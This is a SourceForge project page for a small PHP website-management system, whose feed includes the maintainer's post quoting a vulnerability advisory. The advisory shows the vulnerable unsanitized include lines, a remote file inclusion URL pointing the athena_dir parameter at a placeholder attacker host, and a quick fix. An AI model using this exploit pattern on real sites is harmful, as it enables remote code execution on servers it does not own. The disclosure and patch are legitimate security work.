[X] The "/KpyM Telnet/SSH Server/kts109.exe" file could not be found or is not available. Please select another file.

Share

More
athena php website administration Icon

athena php website administration

prealpha

by olivermay


A simple website management system written in oo php that uses a mysql database to store user and group rights and the site content.


http://athena.sourceforge.net





Separate each tag with a space.

Topics:

License:

Operating System:

Translations:

Intended Audience:

User Interface:

Programming Language:

Registered:

2004-07-10

Ratings and Reviews

Be the first to post a text review of athena php website administration. Rate and review a project by clicking thumbs up or thumbs down in the right column.

Project Feed

  • Exploit

    Edward Z. Yang pointed out that athena is exploitable. Quick fix: in athena.php, add the following code at the top of the file. Another (recommended!) solution is to run php in safe mode. 8< if (!(strpos($athena_dir, "tp://") === false)) { exit; } 8< --Exploit-- Language: PHP Script: Athena Version: 0.1a Official website: http://sourceforge.net/projects/athena Problem: Remote file inclusion Discovered by: beford & ][GB][ Description: =========== A simple website management system written in oo php that uses a mysql database to store user and group rights and the site content. Problem: ======== A remote user can include and execute arbitrary PHP code from the remote location. The problem is in the file "athena.php" for line 1 to 10: include("$athena_dir/headers.php"); include("$athena_dir/classes/debug.php"); include("$athena_dir/classes/mysql.php"); include("$athena_dir/classes/config.php"); include("$athena_dir/classes/page.php"); include("$athena_dir/classes/session.php"); include("$athena_dir/classes/user.php"); include("$athena_dir/classes/error.php"); include("$athena_dir/classes/modules.php"); include("$athena_dir/classes/admin.php"); Exploitation example: =================== http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_url] Solution: ======== Not solution at this time.

    posted by olivermay 1444 days ago

  • Code committed

    olivermay committed patchset 9 of module athena to the athena php website administration CVS repository, changing 1 files

    posted by olivermay 1834 days ago

  • Code committed

    olivermay committed patchset 8 of module athena to the athena php website administration CVS repository, changing 1 files

    posted by olivermay 1903 days ago

  • Code committed

    olivermay committed patchset 7 of module athena to the athena php website administration CVS repository, changing 1 files

    posted by olivermay 1903 days ago

  • Code committed

    olivermay committed patchset 6 of module athena to the athena php website administration CVS repository, changing 1 files

    posted by olivermay 1903 days ago

  • Code committed

    olivermay committed patchset 5 of module athena to the athena php website administration CVS repository, changing 3 files

    posted by olivermay 1903 days ago

  • File released: /athena/v0.1a (prerelease)/athena-0.1a.tar.gz

    posted 1910 days ago

  • Code committed

    olivermay committed patchset 4 of module athena to the athena php website administration CVS repository, changing 11 files

    posted by olivermay 1910 days ago

  • Code committed

    olivermay committed patchset 3 of module athena to the athena php website administration CVS repository, changing 1 files

    posted by olivermay 1910 days ago

  • Code committed

    olivermay committed patchset 2 of module athena to the athena php website administration CVS repository, changing 2 files

    posted by olivermay 1911 days ago

Rate and Review

Be the first person to add a text review.

Would you recommend this project?






<

Related Projects

athena php website administration Actions

Thanks for your rating!

Would you also like to write a review?





Skip Review